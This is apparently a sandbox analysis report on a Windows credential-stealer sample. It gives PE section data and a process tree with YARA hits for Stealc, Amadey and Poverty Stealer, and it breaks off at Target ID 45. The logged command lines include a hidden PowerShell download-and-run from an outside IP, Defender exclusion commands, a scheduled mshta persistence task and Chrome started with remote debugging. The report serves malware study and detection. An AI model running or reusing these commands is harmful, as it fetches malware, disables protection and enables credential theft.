- | 0x55000 | 0x2a7000 | 0x200 | 3a1c09bedc09f6115ecbe8052784f093 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dalsczsh | 0x2fc000 | 0x19c000 | 0x19bc00 | 45fc238cfb5bafbba08ab25daeadc94e | False | 0.9948622258272617 | data | 7.955197108012415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bgqwnedu | 0x498000 | 0x1000 | 0x400 | 5d274984926cd5c1d659325dbd07398e | False | 0.8154296875 | data | 6.292179251946629 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x499000 | 0x3000 | 0x2200 | 3f30c952a6533ea9d1efa37735621f6b | False | 0.06284466911764706 | DOS executable (COM) | 0.6054614960816704 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x53058 | 0x256 | ASCII text, with CRLF line terminators | - | - | 0.5100334448160535

DLL | Import
kernel32.dll | lstrcpy
                                                                                                                                                                                                                        Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:03:47:53
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\5EfYBe3nch.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\5EfYBe3nch.exe"
                                                                                                                                                                                                                        Imagebase:0x9c0000
                                                                                                                                                                                                                        File size:1'858'048 bytes
                                                                                                                                                                                                                        MD5 hash:2BA2329D40AF33806EFDB0BBE5AEB0AD
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1726694915.00000000014B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1743404836.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                        Start time:03:48:14
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe"
                                                                                                                                                                                                                        Imagebase:0x730000
                                                                                                                                                                                                                        File size:5'163'520 bytes
                                                                                                                                                                                                                        MD5 hash:8AFA0085DF245EA0BE67A6A4BABA228D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2273078519.0000000000731000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:03:48:19
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe"
                                                                                                                                                                                                                        Imagebase:0x480000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000005.00000002.1998815042.0000000000481000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                        Start time:03:48:22
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                        Imagebase:0xfa0000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000002.2049080797.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:7
Start time:03:48:22
Start date:31/12/2024
Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:0xfa0000
File size:3'243'520 bytes
MD5 hash:375CE25C0529862F6EE716A3E001BB0E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000007.00000002.2048763354.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:8
Start time:03:48:23
Start date:31/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:03:48:24
Start date:31/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2532,i,194429869990168625,15952654104286526846,262144 /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:03:48:48
Start date:31/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\GIIIIJDHJE.exe"
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:03:48:48
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:03:48:48
Start date:31/12/2024
Path:C:\Users\user\Documents\GIIIIJDHJE.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Documents\GIIIIJDHJE.exe"
Imagebase:0x780000
File size:3'243'520 bytes
MD5 hash:375CE25C0529862F6EE716A3E001BB0E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000D.00000002.2287015642.0000000000781000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:14
Start time:03:48:52
Start date:31/12/2024
Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:0xfa0000
File size:3'243'520 bytes
MD5 hash:375CE25C0529862F6EE716A3E001BB0E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:15
Start time:03:49:00
Start date:31/12/2024
Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:0xfa0000
File size:3'243'520 bytes
MD5 hash:375CE25C0529862F6EE716A3E001BB0E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:16
Start time:03:49:09
Start date:31/12/2024
Path:C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe"
Imagebase:0x6e0000
File size:1'704'448 bytes
MD5 hash:27998D2440B5A856ECA1795EABB8FA23
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: 00000010.00000002.2504667961.00000000006E1000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: 00000010.00000003.2453745116.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 65%, ReversingLabs
Reputation:low
Has exited:true

                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                        Start time:03:49:12
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe"
                                                                                                                                                                                                                        Imagebase:0x8d0000
                                                                                                                                                                                                                        File size:15'360 bytes
                                                                                                                                                                                                                        MD5 hash:9BE5AC720DCF1838FD5A2D7352672F66
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                        • Detection: 30%, ReversingLabs
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                        Start time:03:49:12
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp'
                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff70f330000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:03:49:16
Start date:31/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0xbb0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:03:49:18
Start date:31/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:03:49:18
Start date:31/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0xbb0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:03:49:20
Start date:31/12/2024
Path:C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):true
Commandline:mshta "C:\Temp\.hta"
Imagebase:0x9f0000
File size:13'312 bytes
MD5 hash:06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:03:49:20
Start date:31/12/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks /delete /tn "AutoRunHTA" /f
Imagebase:0xa70000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:03:49:20
Start date:31/12/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
Imagebase:0xa70000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:03:49:20
Start date:31/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Imagebase:0xbb0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:03:49:20
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:03:49:20
Start date:31/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c for %f in ("C:\Temp\*.gif") do (copy "%f" "C:\Temp\\random.hta" & start mshta "C:\Temp\\random.hta")
Imagebase:0x7ff6ec4b0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:03:49:21
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:03:49:22
Start date:31/12/2024
Path:C:\Windows\System32\mshta.exe
Wow64 process (32bit):false
Commandline:mshta "C:\Temp\\random.hta"
Imagebase:0x7ff764df0000
File size:14'848 bytes
MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                        Start time:03:49:22
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                        Start time:03:49:22
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                        Start time:03:49:24
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                        Start time:03:49:24
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                        Start time:03:49:26
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                                                                        Imagebase:0x5f0000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002B.00000002.2673808874.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                        Start time:03:49:31
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                                                                        Imagebase:0x5f0000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002C.00000002.2780754932.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:45
